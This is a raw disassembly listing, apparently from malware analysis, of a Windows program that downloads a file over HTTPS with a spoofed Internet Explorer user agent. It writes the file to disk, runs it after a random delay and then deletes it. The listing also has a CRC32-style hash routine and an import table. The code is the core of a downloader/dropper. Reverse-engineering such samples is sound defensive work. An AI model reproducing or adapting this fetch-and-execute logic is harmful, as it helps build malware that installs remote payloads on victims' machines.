.text:00401C76 68 70 14 40 00 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 7.0; Wind"...
.text:00401C7B 66 89 84 7D DC FD+ mov [ebp+edi*2+var_224], ax
.text:00401C83 C7 45 E8 00 33 00+ mov [ebp+var_18], 3300h
.text:00401C8A FF 15 E0 1E 40 00 call dword_401EE0
.text:00401C90 3B C6 cmp eax, esi
.text:00401C92 0F 84 14 01 00 00 jz loc_401DAC
.text:00401C98 56 push esi
.text:00401C99 68 BB 01 00 00 push 1BBh
.text:00401C9E 8D 8D DC FD FF FF lea ecx, [ebp+var_224]
.text:00401CA4 51 push ecx
.text:00401CA5 50 push eax
.text:00401CA6 FF 15 0C 1F 40 00 call dword_401F0C
.text:00401CAC 3B C6 cmp eax, esi
.text:00401CAE 0F 84 F8 00 00 00 jz loc_401DAC
.text:00401CB4 68 00 00 80 00 push 800000h
.text:00401CB9 56 push esi
.text:00401CBA 56 push esi
.text:00401CBB 56 push esi
.text:00401CBC 8D 8D D4 FB FF FF lea ecx, [ebp+String]
.text:00401CC2 51 push ecx
.text:00401CC3 68 D8 14 40 00 push offset aGet ; "GET"
.text:00401CC8 50 push eax
.text:00401CC9 FF 15 00 1F 40 00 call dword_401F00
.text:00401CCF 6A 04 push 4
.text:00401CD1 5B pop ebx
.text:00401CD2 8B F8 mov edi, eax
.text:00401CD4 53 push ebx
.text:00401CD5 8D 45 E8 lea eax, [ebp+var_18]
.text:00401CD8 50 push eax
.text:00401CD9 6A 1F push 1Fh
.text:00401CDB 57 push edi
.text:00401CDC 89 7D F4 mov [ebp+var_C], edi
.text:00401CDF FF 15 18 1F 40 00 call dword_401F18
.text:00401CE5 53 push ebx
.text:00401CE6 8D 45 F0 lea eax, [ebp+var_10]
.text:00401CE9 50 push eax
.text:00401CEA 6A 3F push 3Fh
.text:00401CEC 57 push edi
.text:00401CED C7 45 F0 0A 00 00+ mov [ebp+var_10], 0Ah
.text:00401CF4 89 75 E4 mov [ebp+var_1C], esi
.text:00401CF7 FF 15 18 1F 40 00 call dword_401F18
.text:00401CFD 53 push ebx
.text:00401CFE 8D 45 E4 lea eax, [ebp+var_1C]
.text:00401D01 50 push eax
.text:00401D02 6A 58 push 58h
.text:00401D04 57 push edi
.text:00401D05 FF 15 18 1F 40 00 call dword_401F18
.text:00401D0B 3B FE cmp edi, esi
.text:00401D0D 0F 84 99 00 00 00 jz loc_401DAC
.text:00401D13 56 push esi
.text:00401D14 56 push esi
.text:00401D15 56 push esi
.text:00401D16 56 push esi
.text:00401D17 56 push esi
.text:00401D18 56 push esi
.text:00401D19 57 push edi
.text:00401D1A FF 15 E4 1E 40 00 call dword_401EE4
.text:00401D20 85 C0 test eax, eax
.text:00401D22 0F 84 84 00 00 00 jz loc_401DAC
.text:00401D28 56 push esi
.text:00401D29 57 push edi
.text:00401D2A FF 15 08 1F 40 00 call dword_401F08
.text:00401D30 85 C0 test eax, eax
.text:00401D32 74 78 jz short loc_401DAC
.text:00401D34 53 push ebx ; flProtect
.text:00401D35 68 00 10 00 00 push 1000h ; flAllocationType
.text:00401D3A BB 00 00 20 00 mov ebx, 200000h
.text:00401D3F 53 push ebx ; dwSize
.text:00401D40 56 push esi ; lpAddress
.text:00401D41 FF 15 34 10 40 00 call VirtualAlloc
.text:00401D47 89 45 FC mov [ebp+lpAddress], eax
.text:00401D4A 33 FF xor edi, edi
.text:00401D4C
.text:00401D4C loc_401D4C: ; CODE XREF: sub_401C0D+17Bj
.text:00401D4C 8D 45 F8 lea eax, [ebp+var_8]
.text:00401D4F 50 push eax
.text:00401D50 FF 75 F4 push [ebp+var_C]
.text:00401D53 89 75 F8 mov [ebp+var_8], esi
.text:00401D56 FF 15 14 1F 40 00 call dword_401F14
.text:00401D5C 8B 45 F8 mov eax, [ebp+var_8]
.text:00401D5F 8D 0C 38 lea ecx, [eax+edi]
.text:00401D62 3B CB cmp ecx, ebx
.text:00401D64 77 32 ja short loc_401D98
.text:00401D66 3B C6 cmp eax, esi
.text:00401D68 76 20 jbe short loc_401D8A
.text:00401D6A 8D 4D EC lea ecx, [ebp+var_14]
.text:00401D6D 51 push ecx
.text:00401D6E 50 push eax
.text:00401D6F 8B 45 FC mov eax, [ebp+lpAddress]
.text:00401D72 03 C7 add eax, edi
.text:00401D74 50 push eax
.text:00401D75 FF 75 F4 push [ebp+var_C]
.text:00401D78 FF 15 10 1F 40 00 call dword_401F10
.text:00401D7E 85 C0 test eax, eax
.text:00401D80 74 03 jz short loc_401D85
.text:00401D82 03 7D EC add edi, [ebp+var_14]
.text:00401D85
.text:00401D85 loc_401D85: ; CODE XREF: sub_401C0D+173j
.text:00401D85 39 75 F8 cmp [ebp+var_8], esi
.text:00401D88 77 C2 ja short loc_401D4C
.text:00401D8A
.text:00401D8A loc_401D8A: ; CODE XREF: sub_401C0D+15Bj
.text:00401D8A 3B FE cmp edi, esi
.text:00401D8C 76 1E jbe short loc_401DAC
.text:00401D8E 8B 45 0C mov eax, [ebp+arg_4]
.text:00401D91 89 38 mov [eax], edi
.text:00401D93 8B 45 FC mov eax, [ebp+lpAddress]
.text:00401D96 EB 16 jmp short loc_401DAE
.text:00401D98 ; ---------------------------------------------------------------------------
.text:00401D98
.text:00401D98 loc_401D98: ; CODE XREF: sub_401C0D+157j
.text:00401D98 39 75 FC cmp [ebp+lpAddress], esi
.text:00401D9B 74 0F jz short loc_401DAC
.text:00401D9D 68 00 80 00 00 push 8000h ; dwFreeType
.text:00401DA2 56 push esi ; dwSize
.text:00401DA3 FF 75 FC push [ebp+lpAddress] ; lpAddress
.text:00401DA6 FF 15 0C 10 40 00 call VirtualFree
.text:00401DAC
.text:00401DAC loc_401DAC: ; CODE XREF: sub_401C0D+85j
.text:00401DAC ; sub_401C0D+A1j ...
.text:00401DAC 33 C0 xor eax, eax
.text:00401DAE
.text:00401DAE loc_401DAE: ; CODE XREF: sub_401C0D+189j
.text:00401DAE 5F pop edi
.text:00401DAF 5E pop esi
.text:00401DB0 5B pop ebx
.text:00401DB1 C9 leave
.text:00401DB2 C3 retn
.text:00401DB2 sub_401C0D endp
.text:00401DB2
.text:00401DB3
.text:00401DB3 ; =============== S U B R O U T I N E =======================================
.text:00401DB3
.text:00401DB3 ; Attributes: bp-based frame
.text:00401DB3
.text:00401DB3 ; int __cdecl sub_401DB3(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
.text:00401DB3 sub_401DB3 proc near ; CODE XREF: start+2CFp
.text:00401DB3
.text:00401DB3 FileName = word ptr -60Ch
.text:00401DB3 var_20C = byte ptr -20Ch
.text:00401DB3 NumberOfBytesWritten= dword ptr -4
.text:00401DB3 lpBuffer = dword ptr 8
.text:00401DB3 nNumberOfBytesToWrite= dword ptr 0Ch
.text:00401DB3
.text:00401DB3 55 push ebp
.text:00401DB4 8B EC mov ebp, esp
.text:00401DB6 81 EC 0C 06 00 00 sub esp, 60Ch
.text:00401DBC 56 push esi
.text:00401DBD 57 push edi
.text:00401DBE 6A 01 push 1
.text:00401DC0 8D 85 F4 FD FF FF lea eax, [ebp+var_20C]
.text:00401DC6 6A 06 push 6
.text:00401DC8 50 push eax
.text:00401DC9 E8 ED F9 FF FF call sub_4017BB
.text:00401DCE 8D 85 F4 FD FF FF lea eax, [ebp+var_20C]
.text:00401DD4 50 push eax
.text:00401DD5 FF 35 D8 1E 40 00 push lpBuffer
.text:00401DDB 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401DE1 68 D0 11 40 00 push offset aSS ; "%s%s"
.text:00401DE6 68 00 02 00 00 push 200h
.text:00401DEB 50 push eax
.text:00401DEC FF 15 FC 1E 40 00 call dword_401EFC
.text:00401DF2 83 C4 20 add esp, 20h
.text:00401DF5 33 FF xor edi, edi
.text:00401DF7 57 push edi ; hTemplateFile
.text:00401DF8 68 80 00 00 00 push 80h ; dwFlagsAndAttributes
.text:00401DFD 6A 02 push 2 ; dwCreationDisposition
.text:00401DFF 57 push edi ; lpSecurityAttributes
.text:00401E00 6A 01 push 1 ; dwShareMode
.text:00401E02 68 00 00 00 40 push 40000000h ; dwDesiredAccess
.text:00401E07 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401E0D 50 push eax ; lpFileName
.text:00401E0E FF 15 20 10 40 00 call CreateFileW
.text:00401E14 8B F0 mov esi, eax
.text:00401E16 83 FE FF cmp esi, 0FFFFFFFFh
.text:00401E19 74 61 jz short loc_401E7C
.text:00401E1B 53 push ebx
.text:00401E1C 57 push edi ; lpOverlapped
.text:00401E1D 8D 45 FC lea eax, [ebp+NumberOfBytesWritten]
.text:00401E20 50 push eax ; lpNumberOfBytesWritten
.text:00401E21 FF 75 0C push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
.text:00401E24 FF 75 08 push [ebp+lpBuffer] ; lpBuffer
.text:00401E27 56 push esi ; hFile
.text:00401E28 FF 15 10 10 40 00 call WriteFile
.text:00401E2E 56 push esi ; hObject
.text:00401E2F 8B D8 mov ebx, eax
.text:00401E31 FF 15 48 10 40 00 call CloseHandle
.text:00401E37 68 60 EA 00 00 push 0EA60h
.text:00401E3C B8 C0 D4 01 00 mov eax, 1D4C0h
.text:00401E41 E8 5B FA FF FF call sub_4018A1
.text:00401E46 8B 35 14 10 40 00 mov esi, Sleep
.text:00401E4C 59 pop ecx
.text:00401E4D 50 push eax ; dwMilliseconds
.text:00401E4E FF D6 call esi ; Sleep
.text:00401E50 3B DF cmp ebx, edi
.text:00401E52 5B pop ebx
.text:00401E53 74 27 jz short loc_401E7C
.text:00401E55 6A 0A push 0Ah
.text:00401E57 57 push edi
.text:00401E58 57 push edi
.text:00401E59 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401E5F 50 push eax
.text:00401E60 57 push edi
.text:00401E61 57 push edi
.text:00401E62 FF 15 DC 1E 40 00 call dword_401EDC
.text:00401E68 68 10 27 00 00 push 2710h ; dwMilliseconds
.text:00401E6D FF D6 call esi ; Sleep
.text:00401E6F 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401E75 50 push eax ; lpFileName
.text:00401E76 FF 15 4C 10 40 00 call DeleteFileW
.text:00401E7C
.text:00401E7C loc_401E7C: ; CODE XREF: sub_401DB3+66j
.text:00401E7C ; sub_401DB3+A0j
.text:00401E7C 5F pop edi
.text:00401E7D 5E pop esi
.text:00401E7E C9 leave
.text:00401E7F C3 retn
.text:00401E7F sub_401DB3 endp
.text:00401E7F
.text:00401E80
.text:00401E80 ; =============== S U B R O U T I N E =======================================
.text:00401E80
.text:00401E80 ; Attributes: bp-based frame
.text:00401E80
.text:00401E80 sub_401E80 proc near ; CODE XREF: sub_4018C7+2Ap
.text:00401E80
.text:00401E80 var_4 = dword ptr -4
.text:00401E80 arg_0 = dword ptr 8
.text:00401E80 arg_4 = dword ptr 0Ch
.text:00401E80
.text:00401E80 55 push ebp
.text:00401E81 8B EC mov ebp, esp
.text:00401E83 51 push ecx
.text:00401E84 53 push ebx
.text:00401E85 56 push esi
.text:00401E86 57 push edi
.text:00401E87 60 pusha
.text:00401E88 8B 75 08 mov esi, [ebp+arg_0]
.text:00401E8B 8B 7D 0C mov edi, [ebp+arg_4]
.text:00401E8E FC cld
.text:00401E8F 33 C9 xor ecx, ecx
.text:00401E91 49 dec ecx
.text:00401E92 8B D1 mov edx, ecx
.text:00401E94
.text:00401E94 loc_401E94: ; CODE XREF: sub_401E80+3Dj
.text:00401E94 33 C0 xor eax, eax
.text:00401E96 33 DB xor ebx, ebx
.text:00401E98 AC lodsb
.text:00401E99 32 C1 xor al, cl
.text:00401E9B 8A CD mov cl, ch
.text:00401E9D 8A EA mov ch, dl
.text:00401E9F 8A D6 mov dl, dh
.text:00401EA1 B6 08 mov dh, 8
.text:00401EA3
.text:00401EA3 loc_401EA3: ; CODE XREF: sub_401E80+36j
.text:00401EA3 66 D1 EB shr bx, 1
.text:00401EA6 66 D1 D8 rcr ax, 1
.text:00401EA9 73 09 jnb short loc_401EB4
.text:00401EAB 66 35 20 83 xor ax, 8320h
.text:00401EAF 66 81 F3 B8 ED xor bx, 0EDB8h
.text:00401EB4
.text:00401EB4 loc_401EB4: ; CODE XREF: sub_401E80+29j
.text:00401EB4 FE CE dec dh
.text:00401EB6 75 EB jnz short loc_401EA3
.text:00401EB8 33 C8 xor ecx, eax
.text:00401EBA 33 D3 xor edx, ebx
.text:00401EBC 4F dec edi
.text:00401EBD 75 D5 jnz short loc_401E94
.text:00401EBF F7 D2 not edx
.text:00401EC1 F7 D1 not ecx
.text:00401EC3 8B C2 mov eax, edx
.text:00401EC5 C1 C0 10 rol eax, 10h
.text:00401EC8 66 8B C1 mov ax, cx
.text:00401ECB 89 45 FC mov [ebp+var_4], eax
.text:00401ECE 61 popa
.text:00401ECF 8B 45 FC mov eax, [ebp+var_4]
.text:00401ED2 5F pop edi
.text:00401ED3 5E pop esi
.text:00401ED4 5B pop ebx
.text:00401ED5 C9 leave
.text:00401ED6 C3 retn
.text:00401ED6 sub_401E80 endp
.text:00401ED6
.text:00401ED6 ; ---------------------------------------------------------------------------
.text:00401ED7 CC align 4
.text:00401ED8 ; LPWSTR lpBuffer
.text:00401ED8 00 00 00 00 lpBuffer dd 0 ; DATA XREF: start+8Aw
.text:00401ED8 ; start+124r ...
.text:00401EDC 00 00 00 00 dword_401EDC dd 0 ; DATA XREF: start+22Dr
.text:00401EDC ; sub_4019C4+ADw ...
.text:00401EE0 00 00 00 00 dword_401EE0 dd 0 ; DATA XREF: sub_4019C4+125w
.text:00401EE0 ; sub_401C0D+7Dr
.text:00401EE4 00 00 00 00 dword_401EE4 dd 0 ; DATA XREF: sub_4019C4+F1w
.text:00401EE4 ; sub_401C0D+10Dr
.text:00401EE8 00 00 00 00 dword_401EE8 dd 0 ; DATA XREF: sub_40197F+1Dr
.text:00401EE8 ; sub_4019C4+83w
.text:00401EEC 00 00 00 00 dword_401EEC dd 0 ; DATA XREF: start+98w
.text:00401EEC ; start+225r ...
.text:00401EF0 00 00 00 00 dword_401EF0 dd 0 ; DATA XREF: start+20Dr
.text:00401EF0 ; sub_4019C4+A0w
.text:00401EF4 00 00 00 00 dword_401EF4 dd 0 ; DATA XREF: sub_4019C4+BDw
.text:00401EF4 ; sub_401C0D+14r
.text:00401EF8 00 00 00 00 dword_401EF8 dd 0 ; DATA XREF: start+7Dw
.text:00401EF8 ; sub_401AFC+76r ...
.text:00401EFC 00 00 00 00 dword_401EFC dd 0 ; DATA XREF: start+162r
.text:00401EFC ; sub_4017BB+1Er ...
.text:00401F00 00 00 00 00 dword_401F00 dd 0 ; DATA XREF: sub_4019C4+10Bw
.text:00401F00 ; sub_401C0D+BCr
.text:00401F04 00 00 00 00 dword_401F04 dd 0 ; DATA XREF: sub_4018A1+Dr
.text:00401F04 ; sub_4019C4+CAw
.text:00401F08 00 00 00 00 dword_401F08 dd 0 ; DATA XREF: sub_4019C4+E4w
.text:00401F08 ; sub_401C0D+11Dr
.text:00401F0C 00 00 00 00 dword_401F0C dd 0 ; DATA XREF: sub_4019C4+118w
.text:00401F0C ; sub_401C0D+99r
.text:00401F10 00 00 00 00 dword_401F10 dd 0 ; DATA XREF: sub_4019C4+12Fw
.text:00401F10 ; sub_401C0D+16Br
.text:00401F14 00 00 00 00 dword_401F14 dd 0 ; DATA XREF: sub_4019C4+D7w
.text:00401F14 ; sub_401C0D+149r
.text:00401F18 00 00 00 00 dword_401F18 dd 0 ; DATA XREF: sub_4019C4+FEw
.text:00401F18 ; sub_401C0D+D2r ...
.text:00401F1C 58 1F 00 00 00 00+ dd 1F58h, 2 dup(0)
.text:00401F28 E8 20 00 00 00 10+ dd 20E8h, 1000h, 1FACh, 2 dup(0)
.text:00401F3C 04 21 00 00 54 10+ dd 2104h, 1054h, 5 dup(0)
.text:00401F58 B4 1F 00 00 C2 1F+ dd 1FB4h, 1FC2h, 1FD2h, 1FE2h, 1FF0h, 1FFCh, 2004h, 2016h
.text:00401F58 00 00 D2 1F 00 00+ dd 202Ch, 203Ah, 2046h, 2056h, 2066h, 2078h, 2088h, 2098h
.text:00401F58 E2 1F 00 00 F0 1F+ dd 20A8h, 20BCh, 20CCh, 20DAh, 0
.text:00401FAC F6 20 00 00 00 00+ dd 20F6h, 0
.text:00401FB4 04 01 45 78 69 74+ dd 78450104h, 72507469h, 7365636Fh, 1360073h, 646E6946h
.text:00401FB4 50 72 6F 63 65 73+ dd 6F736552h, 65637275h, 2F60041h, 64616F4Ch, 6F736552h
.text:00401FB4 73 00 36 01 46 69+ dd 65637275h, 4570000h, 74726956h, 466C6175h, 656572h
.text:00401FB4 6E 64 52 65 73 6F+ dd 7257048Dh, 46657469h, 656C69h, 6C530421h, 706565h, 69530420h
.text:00401FB4 75 72 63 65 41 00+ dd 666F657Ah, 6F736552h, 65637275h, 1F50000h
.text:00402018 47 65 74 4D 6F 64+aGetmodulefilen db 'GetModuleFileNameW',0
.text:0040202B 00 align 4
.text:0040202C 7F 00 43 72 65 61+ dd 7243007Fh, 65746165h, 656C6946h, 4B60057h, 7274736Ch
.text:0040202C 74 65 46 69 6C 65+ dd 576E656Ch, 25B0000h, 54746547h, 50706D65h, 57687461h
.text:0040202C 57 00 B6 04 6C 73+ dd 1E60000h, 4C746547h, 45747361h, 726F7272h, 2200000h
.text:0040202C 74 72 6C 65 6E 57+ dd 50746547h, 41636F72h, 65726464h, 7373h, 69560454h, 61757472h
.text:0040202C 00 00 5B 02 47 65+ dd 6C6C416Ch, 636Fh, 6F4C02F1h, 694C6461h, 72617262h, 4179h
.text:0040202C 74 54 65 6D 70 50+ dd 6F4C0307h, 65526B63h, 72756F73h, 6563h, 654701F6h, 646F4D74h
.text:0040202C 61 74 68 57 00 00+ dd 48656C75h, 6C646E61h, 4165h, 7243008Bh, 65746165h, 6574754Dh
.text:0040202C E6 01 47 65 74 4C+ dd 4178h, 6C430043h, 4865736Fh, 6C646E61h, 0C30065h, 656C6544h
.text:0040202C 61 73 74 45 72 72+ dd 69466574h, 57656Ch, 4E52454Bh, 32334C45h, 6C6C642Eh
.text:0040202C 6F 72 00 00 20 02+ dd 1F80000h, 7373654Dh, 42656761h, 41786Fh, 52455355h
.text:0040202C 47 65 74 50 72 6F+ dd 642E3233h, 6C6Ch, 3Ch dup(0)
.text:0040202C 63 41 64 64 72 65+_text ends
.text:0040202C 73 73 00 00 54 04+
.text:0040202C 56 69 72 74 75 61+
.text:0040202C 6C 41 6C 6C 6F 63+ end start